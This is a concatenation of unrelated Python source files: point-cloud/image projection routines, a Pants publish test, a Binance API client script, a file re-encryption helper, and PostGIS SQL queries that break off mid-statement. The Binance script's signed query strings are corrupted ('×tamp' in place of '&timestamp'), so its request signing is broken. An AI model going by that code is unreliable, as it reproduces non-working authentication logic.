W = (self.data > 0).astype(np.float32) # convert to binary adjacency matrix
npnt = np.array(W.sum(axis=0)).ravel() # get number of points per pixel
return hylite.HyImage( npnt.reshape( (self.xdim, self.ydim, 1 ), order='F' ) )
def pixels_per_point(self):
"""
Calculates how many pixels project to each point.
Returns:
- a copy of self.cloud, but with a scalar field containing pixel counts per point. If self.cloud is not defined
then a numpy array of point counts will be returned.
"""
self.csc() # use column compressed form
W = (self.data > 0).astype(np.float32) # convert to binary adjacency matrix
npix = np.array(W.sum(axis=1)).ravel() # get number of points per pixel
if self.cloud is not None: # return a cloud
out = self.cloud.copy( data = False )
out.data = npix[:,None]
return out
else:
return npix # return a numpy array
def intersect(self, map2):
"""
Get point indices that exist (are visible in) this scene and another.
*Arguments*:
- map2 = a PMap instance that references the same cloud but with a different image/viewpoint.
*Returns*:
- indices = a list of point indices that are visible in both scenes.
"""
S1 = set( self.points )
S2 = set( map2.points )
return list( S1 & S2 )
def union(self, maps):
"""
Returns points that are included in one or more of the passed PMaps.
*Arguments*:
- maps = a list of pmap instances to compare with (or just one).
*Returns*:
- indices = a list of point indices that are visible in either or both scenes.
"""
if not isinstance(maps, list):
maps = [maps]
S_n = [set(s.points) for s in maps]
S1 = set(self.points)
return S1.union(*S_n)
def intersect_pixels(self, map2):
"""
Identifies matching pixels between two scenes.
*Arguments*:
- map2 = the scene to match against this one
*Returns*:
- px1 = a numpy array of (x,y) pixel coordinates in this scene.
- px2 = a numpy array of corresponding (x,y) pixel coordinates in scene 2.
"""
px1 = []
px2 = []
overlap = self.intersect(map2) # get points visible in both
for idx in overlap:
for _px1 in self.get_pixel_indices(idx)[0]:
for _px2 in map2.get_pixel_indices(idx)[0]:
px1.append(_px1)
px2.append(_px2)
return np.array(px1), np.array(px2)
def remove_nan_pixels(self, image=None):
"""
Removes mappings to nan pixels from linkage matrix.
*Arguments*:
- image = the image containing nan pixels that should be removed. Default is self.image.
"""
self.csc() # change to column format
if image is None:
image = self.image
# build list of nan columns
isnan = np.logical_not(np.isfinite(image.data).all(axis=-1)).ravel(order='F')
f = np.ones(isnan.shape[0])
f[isnan] = 0
# zero elements in these
self.data = self.data.multiply(f)
# remove zero elements
self.data.eliminate_zeros()
def filter_footprint(self, thresh=50):
"""
Filter projections in a PMap instance and remove pixels that have a
on-ground footprint above the specified threshold. This operation is
applied in-place to conserve memory.
*Arguments*:
- thresh = the maximum allowable pixel footprint (in points). Pixels containing > than
this number of points will be removed from the projection map.
"""
# calculate footprint
W = (self.data > 0).astype(np.float32) # convert to binary adjacency matrix
n = np.array(W.sum(axis=0)).ravel() # get number of points per pixel
# if isinstance(thresh, int): # calculate threshold as percentile if need be
# thresh = np.percentile( n[ n > 0], thresh )
# convert to coo format
self.coo()
# rebuild mapping matrix
mask = n[self.data.col] < thresh # valid points
self.data = coo_matrix((self.data.data[mask], (self.data.row[mask], self.data.col[mask])),
shape=(self.npoints, self.xdim * self.ydim), dtype=np.float32)
def filter_occlusions(self, occ_tol=5.):
"""
Filter projections in a PMap instance and remove points that are likely to be
occluded. This operation is applied in-place to conserve memory.
*Arguments*:
- occ_tol = the tolerance of the occlusion culling. Points within this distance of the
closest point in each pixel will be retained.
"""
zz = np.max(self.data, axis=0).power(-1) ## calculate closest point in each pixel
zz.data += occ_tol
zz = zz.tocsc()
self.coo()
# rebuild mapping matrix
mask = self.data.data > (1 / zz[0, self.data.col].toarray()[0, :]) ## which points to include
self.data = coo_matrix((self.data.data[mask], (self.data.row[mask], self.data.col[mask])),
shape=(self.npoints, self.xdim * self.ydim), dtype=np.float32)
def _gather_bands(data, bands):
"""
Utility function used by push_to_image( ... ) and push_to_cloud( ... ) to slice data from a HyData instance.
*Returns*:
- data = a data array containing the requested bands (hopefully).
- wav = the wavelengths of the extracted bands (or -1 for non-spectral attributes).
- names = the names of the extracted bands.
"""
# extract wavelength and band name info
dat = []
wav = []
nam = []
# loop through bands tuple/list and extract data indices/slices
for e in bands:
# extract from point cloud based on string
if isinstance(e, str):
for c in e.lower():
if c == 'r':
assert data.has_rgb(), "Error - RGB information not found."
dat.append(data.rgb[..., 0])
nam.append('r')
wav.append(hylite.RGB[0])
elif c == 'g':
assert data.has_rgb(), "Error - RGB information not found."
dat.append(data.rgb[..., 1])
nam.append('g')
wav.append(hylite.RGB[1])
elif c == 'b':
assert data.has_rgb(), "Error - RGB information not found."
dat.append(data.rgb[..., 2])
nam.append('b')
wav.append(hylite.RGB[2])
elif c == 'x':
dat.append(data.xyz[..., 0])
nam.append('x')
wav.append(-1)
elif c == 'y':
dat.append(data.xyz[..., 1])
nam.append('y')
wav.append(-1)
elif c == 'z':
dat.append(data.xyz[..., 2])
nam.append('z')
wav.append(-1)
elif c == 'k':
assert data.has_normals(), "Error - normals not found."
dat.append(data.normals[..., 0])
nam.append('k')
wav.append(-1)
elif c == 'l':
assert data.has_normals(), "Error - normals not found."
dat.append(data.normals[..., 1])
nam.append('l')
wav.append(-1)
elif c == 'm':
assert data.has_normals(), "Error - normals not found."
dat.append(data.normals[..., 2])
nam.append('m')
wav.append(-1)
# extract slice
elif isinstance(e, tuple):
assert len(e) == 2, "Error - band slices must be tuples of length two."
idx0 = data.get_band_index(e[0])
idx1 = data.get_band_index(e[1])
dat += [data.data[..., b] for b in range(idx0, idx1)]
if data.has_band_names():
nam += [data.get_band_names()[b] for b in range(idx0, idx1)]
else:
nam += [str(b) for b in range(idx0, idx1)]
if data.has_wavelengths():
wav += [data.get_wavelengths()[b] for b in range(idx0, idx1)]
else:
wav += [float(b) for b in range(idx0, idx1)]
# extract band based on index or wavelength
elif isinstance(e, float) or isinstance(e, int):
b = data.get_band_index(e)
dat.append(data[..., b])
if data.has_band_names():
nam.append(data.get_band_names()[b])
else:
nam.append(str(b))
if data.has_wavelengths():
wav.append(data.get_wavelengths()[b])
else:
wav.append(float(b))
else:
assert False, "Unrecognised band descriptor %s" % b
if data.is_image():
dat = np.dstack(dat) # stack
else:
dat = np.vstack(dat).T
return dat, wav, nam
def push_to_cloud(pmap, bands=(0, -1), method='best', image=None, cloud=None ):
"""
Push the specified bands from an image onto a hypercloud using a (precalculated) PMap instance.
*Arguments*:
- pmap = a pmap instance. the pmap.image and pmap.cloud references must also be defined.
- bands = List defining the bands to include in the output dataset. Elements should be one of:
- numeric = index (int), wavelength (float) of an image band
- tuple of length 2: start and end bands (float or integer) to export.
- iterable of length > 2: list of bands (float or integer) to export.
- method = The method used to condense data from multiple pixels onto each point. Options are:
- 'closest': use the closest pixel to each point.
- 'distance': average with inverse distance weighting.
- 'count' : average weighted inverse to the number of points in each pixel.
- 'best' : use the pixel that is mapped to the fewest points (only). Default.
- 'average' : average with all pixels weighted equally.
- image = the image to project (if different to pmap.image). Must have matching dimensions. Default is pmap.image.
- cloud = the cloud to project (if different to pmap.cloud). Must have matching dimensions. Default is pmap.cloud.
*Returns*:
- A HyCloud instance containing the back-projected data.
"""
if image is None:
image = pmap.image
if cloud is None:
cloud = pmap.cloud
# get image array of data to copy across
data = image.export_bands(bands)
# flatten it
X = data.data.reshape(-1, data.data.shape[-1], order='F') # n.b. we don't used data.X() to ensure 'C' order
# convert pmap to csc format
pmap.csc() # thunk; would csr format be faster??
pmap.remove_nan_pixels() # drop nan pixels
# build weights matrix
if 'closest' in method.lower():
# get closest pixels
closest = np.argmax(pmap.data, axis=1) # find closest pixel to each point (largest 1/z along cols)
# assemble sparse matrix with closest pixels scored as 1
rows = np.argwhere(closest > 0)[:, 0]
cols = np.array(closest[rows])[:, 0]
vals = np.ones(rows.shape)
W = csc_matrix((vals, (rows, cols)), pmap.data.shape, dtype=np.float32)
# sum of weights is easy
n = np.ones(pmap.npoints, dtype=np.float32)
elif 'average' in method.lower():
W = (pmap.data > 0).astype(np.float32) # weights matrix [ full of ones ]
n = np.array(W.sum(axis=1))[:, 0] # sum of weights (for normalising later)
elif 'count' in method.lower() or 'best' in method.lower():
W = (pmap.data > 0).astype(np.float32) # convert to binary adjacency matrix
npoints = np.array(W.sum(axis=0))[0, :] # get number of points per pixel
W = W.multiply(1 / npoints) # fill non-zero values with 1 / points in relevant pixel
if 'best' in method.lower(): # filter W so we keep only the best points
best = np.argmax(W, axis=1) # assemble sparse matrix with best pixels scored as 1
rows = np.argwhere(best > 0)[:, 0]
cols = np.array(best[rows])[:, 0]
vals = np.ones(rows.shape)
W = csc_matrix((vals, (rows, cols)), pmap.data.shape, dtype=np.float32)
n = np.array(W.sum(axis=1))[:, 0] # sum of weights (for normalising later)
elif 'distance' in method.lower():
W = pmap.data # easy!
n = np.array(W.sum(axis=1))[:, 0] # sum of weights (for normalising later)
else:
assert False, "Error - %s is an invalid method." % method
# calculate output
#V = W.dot(X) / n[:, None]
V = W@X / n[:, None]
# build output cloud
out = cloud.copy(data=False)
out.data = V
if data.has_wavelengths():
out.set_wavelengths(data.get_wavelengths())
return out
def push_to_image(pmap, bands='xyz', method='closest', image=None, cloud=None):
"""
Project the specified data from a point cloud onto an image using a (precalculated) PMap instance. If multiple points map
to a single pixel then the results are averaged.
*Arguments*:
- pmap = a pmap instance. the pmap.image and pmap.cloud references must also be defined.
- bands = List defining the bands to include in the output dataset. Elements should be one of:
- numeric = index (int), wavelength (float) of an image band
- bands = a list of image band indices (int) or wavelengths (float). Inherent properties of point clouds
can also be expected by passing any combination of the following:
- 'rgb' = red, green and blue per-point colour values
- 'klm' = point normals
- 'xyz' = point coordinates
- iterable of length > 2: list of bands (float or integer) to export.
- method = The method used to condense data from multiple points onto each pixel. Options are:
- 'closest': use the closest point to each pixel (default is this is fastest).
- 'average' : average with all pixels weighted equally. Slow.
- image = the image to project (if different to pmap.image). Must have matching dimensions. Default is pmap.image.
- cloud = the cloud to project (if different to pmap.cloud). Must have matching dimensions. Default is pmap.cloud.
*Returns*:
- A HyImage instance containing the projected data.
"""
if image is None:
image = pmap.image
if cloud is None:
cloud = pmap.cloud
# special case: individual band; wrap in list
if isinstance(bands, int) or isinstance(bands, float) or isinstance(bands, str):
bands = [bands]
# special case: tuple of two bands; treat as slice
if isinstance(bands, tuple) and len(bands) == 2:
bands = [bands]
# gather data to project
dat, wav, nam = _gather_bands(cloud, bands) # extract point normals, positions and sky view
# convert pmap to csr format
# pmap.csr()
# build weights matrix
if 'closest' in method.lower():
closest = np.array(np.argmax(pmap.data, axis=0))[0,
:] # find closest point to each pixel (largest 1/z along rows)
# assemble sparse matrix with closest points scored as 1
cols = np.argwhere(closest > 0)[:, 0]
rows = np.array(closest[cols])
vals = np.ones(rows.shape)
W = csc_matrix((vals, (rows, cols)), pmap.data.shape, dtype=np.float32)
#V = W.T.dot(dat) # project closest poits
V = W.T@dat # project closest poits
elif 'average' in method.lower():
W = (pmap.data > 0).astype(np.float32) # weights matrix [ full of ones ]
n = np.array(W.sum(axis=0))[0, :] # sum of weights
#V = W.T.dot(dat) / n[:, None] # calculate average
V = W.T@dat / n[:, None] # calculate average
else:
assert False, "Error - %s is an invalid method for cloud_to_image." % method
# build output image
out = image.copy(data=False)
out.data = np.reshape(V, (image.xdim(), image.ydim(), -1), order='F')
out.data[out.data == 0] = np.nan # replace zeros with nans
out.set_wavelengths(wav)
out.set_band_names(nam)
return out
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
from dataclasses import dataclass
from textwrap import dedent
import pytest
from pants.backend.python.goals import package_dists
from pants.backend.python.macros.python_artifact import PythonArtifact
from pants.backend.python.target_types import PythonDistribution, PythonSourcesGeneratorTarget
from pants.backend.python.target_types_rules import rules as python_target_type_rules
from pants.core.goals import package, publish
from pants.core.goals.publish import (
Publish,
PublishFieldSet,
PublishPackages,
PublishProcesses,
PublishRequest,
)
from pants.engine.process import InteractiveProcess
from pants.engine.rules import rule
from pants.engine.target import StringSequenceField
from pants.testutil.rule_runner import RuleRunner
class MockRepositoriesField(StringSequenceField):
alias = "repositories"
@dataclass(frozen=True)
class MockPublishRequest(PublishRequest):
pass
@dataclass(frozen=True)
class PublishTestFieldSet(PublishFieldSet):
publish_request_type = MockPublishRequest
required_fields = (MockRepositoriesField,)
repositories: MockRepositoriesField
@rule
async def mock_publish(request: MockPublishRequest) -> PublishProcesses:
if not request.field_set.repositories.value:
return PublishProcesses()
return PublishProcesses(
PublishPackages(
names=tuple(
artifact.relpath
for pkg in request.packages
for artifact in pkg.artifacts
if artifact.relpath
),
process=None if repo == "skip" else InteractiveProcess(["echo", repo]),
description="(requested)" if repo == "skip" else repo,
)
for repo in request.field_set.repositories.value
)
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*package.rules(),
*publish.rules(),
*package_dists.rules(),
*python_target_type_rules(),
mock_publish,
PythonDistribution.register_plugin_field(MockRepositoriesField),
*PublishTestFieldSet.rules(),
],
target_types=[PythonSourcesGeneratorTarget, PythonDistribution],
objects={"python_artifact": PythonArtifact},
)
def test_noop(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/BUILD": dedent(
"""\
python_sources()
python_distribution(
name="dist",
provides=python_artifact(
name="my-package",
version="0.1.0",
),
)
"""
),
}
)
result = rule_runner.run_goal_rule(
Publish,
args=("src:dist",),
env_inherit={"HOME", "PATH", "PYENV_ROOT"},
)
assert result.exit_code == 0
assert "Nothing published." in result.stderr
def test_skipped_publish(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/BUILD": dedent(
"""\
python_sources()
python_distribution(
name="dist",
provides=python_artifact(
name="my-package",
version="0.1.0",
),
repositories=["skip"],
)
"""
),
}
)
result = rule_runner.run_goal_rule(
Publish,
args=("src:dist",),
env_inherit={"HOME", "PATH", "PYENV_ROOT"},
)
assert result.exit_code == 0
assert "my-package-0.1.0.tar.gz skipped (requested)." in result.stderr
assert "my_package-0.1.0-py3-none-any.whl skipped (requested)." in result.stderr
def test_structured_output(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/BUILD": dedent(
"""\
python_sources()
python_distribution(
name="dist",
provides=python_artifact(
name="my-package",
version="0.1.0",
),
repositories=["skip"],
)
"""
),
}
)
result = rule_runner.run_goal_rule(
Publish,
args=(
"--output=published.json",
"src:dist",
),
env_inherit={"HOME", "PATH", "PYENV_ROOT"},
)
assert result.exit_code == 0
assert "my-package-0.1.0.tar.gz skipped (requested)." in result.stderr
assert "my_package-0.1.0-py3-none-any.whl skipped (requested)." in result.stderr
expected = [
{
"names": [
"my-package-0.1.0.tar.gz",
"my_package-0.1.0-py3-none-any.whl",
],
"published": False,
"status": "skipped (requested)",
"target": "src:dist",
},
]
with open("published.json") as fd:
data = json.load(fd)
assert data == expected
@pytest.mark.skip("Can not run interactive process from test..?")
@pytest.mark.no_error_if_skipped
def test_mocked_publish(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/BUILD": dedent(
"""\
python_sources()
python_distribution(
name="dist",
provides=python_artifact(
name="my-package",
version="0.1.0",
),
repositories=["mocked-repo"],
)
"""
),
}
)
result = rule_runner.run_goal_rule(
Publish,
args=("src:dist",),
env_inherit={"HOME", "PATH", "PYENV_ROOT"},
)
assert result.exit_code == 0
assert "my-package-0.1.0.tar.gz published." in result.stderr
assert "my_package-0.1.0-py3-none-any.whl published." in result.stderr
assert "mocked-repo" in result.stdout
|
import requests
import hmac
import hashlib
import base64
import time
token = "YOUR TOKEN"
secretKey = b"YOUR SECRETKEY"
baseURL = "https://api.binance.com"
pingURL = "/api/v1/ping"
timeURL = "/api/v1/time"
bookURL = "/api/v1/depth"
recentTradeURL = "/api/v1/trades"
historicalTradeURL = "/api/v1/historicalTrades"
rangeTradeURL = "/api/v1/aggTrades"
candlestickURL = "/api/v1/klines"
dayURL="/api/v1/ticker/24hr"
priceURL = "/api/v3/ticker/price"
bookTickerURL="/api/v3/ticker/bookTicker"
testNewOrderURL = "/api/v3/order/test"
orderURL="/api/v3/order"
openOrdersURL="/api/v3/openOrders"
allOrdersURL="/api/v3/allOrders"
accountInfoURL="/api/v3/account"
accountTradesURL="/api/v3/myTrades"
######API CALLS
def getSignature(message, key):
#returns a signature
dig = hmac.new(key, msg=message, digestmod=hashlib.sha256).hexdigest()
return dig
def checkStatus():
#returns true if status=200, otherwise false
global baseURL, pingURL
if requests.get(baseURL+pingURL).status_code==200:
return True
else:
return False
def getTimestamp():
#returns timestamp of binance servers
global baseURL, timeURL
return requests.get(baseURL+timeURL).json()['serverTime']
def getOrderBook(symbol, limit=None):
#returns current order book
global baseURL, bookURL
return requests.get(baseURL+bookURL, params={"symbol":symbol,"limit":limit}).json()
def getRecentTrades(symbol, limit=None):
#returns recent trades
global baseURL, recentTradeURL
return requests.get(baseURL+recentTradeURL, params={"symbol":symbol, "limit":limit}).json()
def getHistoricalTrade(token, symbol, limit=None, fromId=None):
#returns historical trade
global baseURL, historicalTradeURL
return requests.get(baseURL+historicalTradeURL, headers={"X-MBX-APIKEY":token},params={"symbol":symbol, "limit":limit, "fromId":fromId}).json()
def getTradesByTimeRange(token, symbol, startTime=None, endTime=None, limit=None, fromId=None):
#returns trades in a timeframe
global baseURL, rangeTradeURL
return requests.get(baseURL+rangeTradeURL,headers={"X-MBX-APIKEY":token}, params={"symbol":symbol, "limit":limit, "fromId":fromId, "startTime":startTime, "endTime":endTime}).json()
def getCandleStick(token, symbol, interval, limit=None, startTime=None, endTime=None):
#returns candlestick data
#interval values can be:
# "1m","3m","5m","15m","30m","1h","2h","4h","6h","8h","12h","1d","3d","1w", "1M"
global baseURL, candlestickURL
return requests.get(baseURL+candlestickURL, headers={"X-MBX-APIKEY":token},params={"symbol":symbol, "limit":limit, "interval":interval, "startTime":startTime, "endTime":endTime}).json()
def get24HrSwing(token, symbol=None):
#returns 24hr data
global baseURL, dayURL
return requests.get(baseURL+dayURL, headers={"X-MBX-APIKEY":token},params={"symbol":symbol}).json()
def getPrice(token, symbol=None):
#returns price data
global baseURL, priceURL
return requests.get(baseURL+priceURL, headers={"X-MBX-APIKEY":token},params={"symbol":symbol}).json()
def getBookTicker(token, symbol=None):
#returns price/qty data
global baseURL, bookTickerURL
return requests.get(baseURL+bookTickerURL, headers={"X-MBX-APIKEY":token},params={"symbol":symbol}).json()
def newOrder(token, secretKey, symbol, side, orderType, quantity, timestamp=getTimestamp(), timeInForce=None, price=None, newClientOrderId=None, stopPrice=None, newOrderRespType=None, recvWindow=None, live=False):
#submits a new order
global baseURL, testNewOrderURL, orderURL
if live != True:
orderURL = testNewOrderURL
data = {
"symbol":symbol,
"side":side,
"type":orderType,
"quantity":quantity,
"timestamp":timestamp,
}
message = "symbol={0}&side={1}&type={2}&quantity={3}×tamp={4}".format(symbol, side, orderType, quantity, timestamp)
if timeInForce != None:
message+="&timeInForce={}".format(timeInForce)
data['timeInForce']=timeInForce
if price != None:
message+="&price={}".format(price)
data['price']=price
if newClientOrderId != None:
message+="&newClientOrderId={}".format(newClientOrderId)
data['newClientOrderId']=newClientOrderId
if stopPrice != None:
message+="&stopPrice={}".format(stopPrice)
data['stopPrice']=stopPrice
if newOrderRespType!=None:
message+="&newOrderRespType={}".format(newOrderRespType)
data['newOrderRespType']=newOrderRespType
if recvWindow!=None:
message+="&recvWindow={}".format(recvWindow)
data['recvWindow']=recvWindow
signature = getSignature(message.encode('utf-8'), secretKey)
data['signature']=signature
return requests.post(baseURL+orderURL, headers={"X-MBX-APIKEY":token}, data=data).json()
def getOrderStatus(token, secretKey, symbol, timestamp=getTimestamp(), orderId=None, origClientId=None, recvWindow=None):
#returns an order status
global baseURL, orderURL
message="symbol={0}×tamp={1}".format(symbol, timestamp)
params={
"symbol":symbol,
"timestamp":timestamp,
}
if orderId:
params['orderId']=orderId
message+="&orderId={}".format(orderId)
if origClientId:
params['origClientId']=origClientId
message+="&origClientId={}".format(origClientId)
if recvWindow:
params['recvWindow']=recvWindow
message+="&recvWindow={}".format(recvWindow)
signature = getSignature(message.encode('utf-8'), secretKey)
params['signature']=signature
return requests.get(baseURL+orderURL, headers={"X-MBX-APIKEY":token}, params=params).json()
def cancelOrder(token, secretKey, symbol, timestamp=getTimestamp(), orderId=None, origClientId=None, newClientOrderId=None, recvWindow=None):
#cancels an order
global baseURL, orderURL
message="symbol={0}×tamp={1}".format(symbol, timestamp)
params={
"symbol":symbol,
"timestamp":timestamp,
}
if orderId:
params['orderId']=orderId
message+="&orderId={}".format(orderId)
if origClientId:
params['origClientId']=origClientId
message+="&origClientId={}".format(origClientId)
if recvWindow:
params['recvWindow']=recvWindow
message+="&recvWindow={}".format(recvWindow)
if newClientOrderId:
params['newClientOrderId']=newClientOrderId
message+="&newClientOrderId={}".format(newClientOrderId)
signature = getSignature(message.encode('utf-8'), secretKey)
params['signature']=signature
return requests.delete(baseURL+orderURL,headers={"X-MBX-APIKEY":token}, params=params).json()
def getOpenOrders(token, secretKey, timestamp=getTimestamp(), symbol=None, recvWindow=None):
#gets open orders
global baseURL, openOrdersURL
message = "timestamp={}".format(timestamp)
params={
"timestamp":timestamp
}
if symbol:
params['symbol']=symbol
message+="&symbol={}".format(symbol)
if recvWindow:
params['recvWindow']=recvWindow
message+="&recvWindow=&{}".format(recvWindow)
signature = getSignature(message.encode('utf-8'), secretKey)
params['signature']=signature
return requests.get(baseURL+openOrdersURL, headers={"X-MBX-APIKEY":token}, params=params).json()
def getAllOrders(token, secretKey, symbol, timestamp=getTimestamp(), recvWindow=None, limit=None, orderId=None):
#returns all orders
global baseURL, allOrdersURL
message="symbol={0}×tamp={1}".format(symbol, timestamp)
params={
"symbol":symbol,
"timestamp":timestamp,
}
if orderId:
params['orderId']=orderId
message+="&orderId={}".format(orderId)
if limit:
params['limit']=limit
message+="&limit={}".format(limit)
if recvWindow:
params['recvWindow']=recvWindow
message+="&recvWindow={}".format(recvWindow)
signature = getSignature(message.encode('utf-8'), secretKey)
params['signature']=signature
return requests.get(baseURL+allOrdersURL, headers={"X-MBX-APIKEY":token}, params=params).json()
def getAccountInfo(token, secretKey, timestamp=getTimestamp(), recvWindow=None):
#gets account info
global baseURL, accountInfoURL
message="timestamp={}".format(timestamp)
params={
"timestamp":timestamp
}
if recvWindow:
params['recvWindow']=recvWindow
message+="&recvWindow={}".format(recvWindow)
signature = getSignature(message.encode('utf-8'), secretKey)
params['signature']=signature
return requests.get(baseURL+accountInfoURL, headers={"X-MBX-APIKEY":token}, params=params).json()
def getTrades(token, secretKey, symbol, timestamp=getTimestamp(), limit=None, fromId=None, recvWindow=None):
#gets account trades
global baseURL, accountTradesURL
message="symbol={0}×tamp={1}".format(symbol, timestamp)
params={
"symbol":symbol,
"timestamp":timestamp,
}
if recvWindow:
params['recvWindow']=recvWindow
message+="&recvWindow={}".format(recvWindow)
if limit:
params['limit']=limit
message+="&limit={}".format(limit)
if fromId:
params['fromId']=fromId
message+="&fromId={}".format(fromId)
signature = getSignature(message.encode('utf-8'), secretKey)
params['signature']=signature
return requests.get(baseURL+accountTradesURL, headers={"X-MBX-APIKEY":token}, params=params).json()
def buyAdvised(token, symbol, threshhold, startingPrice=None, pollingInterval=None):
#returns true when price moves down a certain percent
if pollingInterval==None:
interval = 1
if startingPrice==None:
startingPrice = float(getPrice(token, symbol)['price'])
while True:
currentPrice = float(getPrice(token,symbol)['price'])
currentDifference = (1-(currentPrice/startingPrice))*100
if currentDifference>=threshhold:
print("buy advised\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
return True
print("Not Yet:\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
time.sleep(interval)
def sellAdvised(token, symbol, threshhold, startingPrice=None, pollingInterval=None):
#returns true when price up a certain percent
if pollingInterval==None:
interval = 1
if startingPrice==None:
startingPrice = float(getPrice(token, symbol)['price'])
while True:
currentPrice = float(getPrice(token,symbol)['price'])
currentDifference = ((currentPrice-startingPrice)/startingPrice)*100
if currentDifference>=threshhold:
print("sell advised\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
return True
print("Not Yet:\nstartingPrice: {0}\ncurrentPrice: {1}".format(startingPrice, currentPrice))
time.sleep(interval)
buyAdvised(token, "XRPETH", 1)
#print(newOrder(token, secretKey, "ETHBTC", "BUY", "LIMIT", "1", price=.9, timeInForce="GTC", live=False))
|
import logging
import tempfile
import typing
from datetime import datetime
import arrow
from blazeutils.helpers import ensure_list
try:
import keg_elements.crypto as ke_crypto
except ImportError:
ke_crypto = None
DEFAULT_KEY_SIZE = 32
log = logging.getLogger(__name__)
class DecryptionException(Exception):
pass
class EncryptionKeyException(Exception):
pass
class MissingDependencyException(Exception):
pass
def verify_key_length(key, expected=DEFAULT_KEY_SIZE):
return len(key) == expected
def reencrypt(storage, path, old_key, new_key):
if ke_crypto is None:
raise MissingDependencyException('Keg Elements is required for crypto operations')
old_key = ensure_list(old_key)
# We append the new key just in case the operation was restarted and we have already encrypted
# some files
keys = list(filter(verify_key_length, old_key + [new_key]))
if not keys:
raise EncryptionKeyException('No Keys Found')
else:
log.info('Found {} keys'.format(len(keys)))
if not verify_key_length(new_key, expected=DEFAULT_KEY_SIZE):
raise EncryptionKeyException('New key is not the correct size. Got {}, expecting {}'.format(
len(new_key), DEFAULT_KEY_SIZE
))
with tempfile.NamedTemporaryFile() as old_key_local, \
tempfile.NamedTemporaryFile() as new_key_local:
log.info('Fetching {}'.format(path))
storage.get(path, old_key_local.name)
old_key_bytes = None
for idx, key in enumerate(keys):
try:
log.info('Trying to decrypt {}.'.format(path))
old_key_bytes = ke_crypto.decrypt_bytesio(key, old_key_local.name)
log.info('Successfully Decrypted {} with key {}.'.format(path, idx))
except Exception as e:
log.info('Key {} failed for {}'.format(idx, path))
if str(e) == 'Invalid padding bytes.':
continue
log.error('Unhandled error for decrypt with key {}: {}.'.format(idx, str(e)))
if old_key_bytes is None:
raise DecryptionException('Unable to Decrypt File {}'.format(path))
log.info('Re-encrypting {}'.format(path))
new_key_bytes = ke_crypto.encrypt_fileobj(new_key, old_key_bytes)
log.info('Writing newly encrypted data {}.'.format(path))
for chunk in new_key_bytes:
new_key_local.write(chunk)
new_key_local.flush()
storage.put(new_key_local.name, path)
log.info('Re-encryption complete for {}.'.format(path))
def expire_time_to_seconds(
expire_time: typing.Union[arrow.Arrow, datetime],
*,
now: typing.Callable[[], arrow.Arrow] = arrow.utcnow
):
_now = now()
if isinstance(expire_time, datetime):
expire_time = arrow.get(expire_time)
if expire_time < _now:
raise ValueError('Expiration time is in the past')
return (expire_time - _now).total_seconds()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
get_nvl_circle_list_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.radius AS radius,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND (
$2::VARCHAR is NULL OR
ncr.label ILIKE $2::VARCHAR || '%' OR
ncr.label ILIKE '%' || $2::VARCHAR || '%' OR
ncr.label ILIKE $2::VARCHAR || '%')
"""
get_nvl_circle_list_count_query = """
SELECT count(*) AS nvl_circle_count
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND (
$2::VARCHAR is NULL OR
ncr.label ILIKE $2::VARCHAR || '%' OR
ncr.label ILIKE '%' || $2::VARCHAR || '%' OR
ncr.label ILIKE $2::VARCHAR || '%')
"""
get_nvl_circle_element_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.radius AS radius,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND ncr.id = $2::BIGINT
"""
get_nvl_circle_element_by_location_id_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.radius AS radius,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS nloc ON nloc.id = ncr.location_id
LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND ncr.location_id = $2::BIGINT
ORDER BY ncr.created_on DESC LIMIT 1
"""
get_nvl_circle_list_by_user_id_query = """
SELECT ncr.id AS id,
ST_FlipCoordinates(ncr.geom)::geometry AS geom,
ncr.label AS label,
ncr.color AS color,
ncr.location_id AS location_id,
ncr.user_id AS user_id,
ncr.radius AS radius,
loc.location_type_id AS location_type_id,
ltp.name AS location_type,
loc.user_id AS user_id,
loc.name AS location_name,
usr.fullname AS user_fullname,
loc.show_on_map AS show_on_map,
ncr.active AS active,
ncr.deleted AS deleted
FROM public.nvl_circle AS ncr
LEFT OUTER JOIN public.location AS loc ON loc.id = ncr.location_id
LEFT OUTER JOIN public.location_type AS ltp ON ltp.id = loc.location_type_id
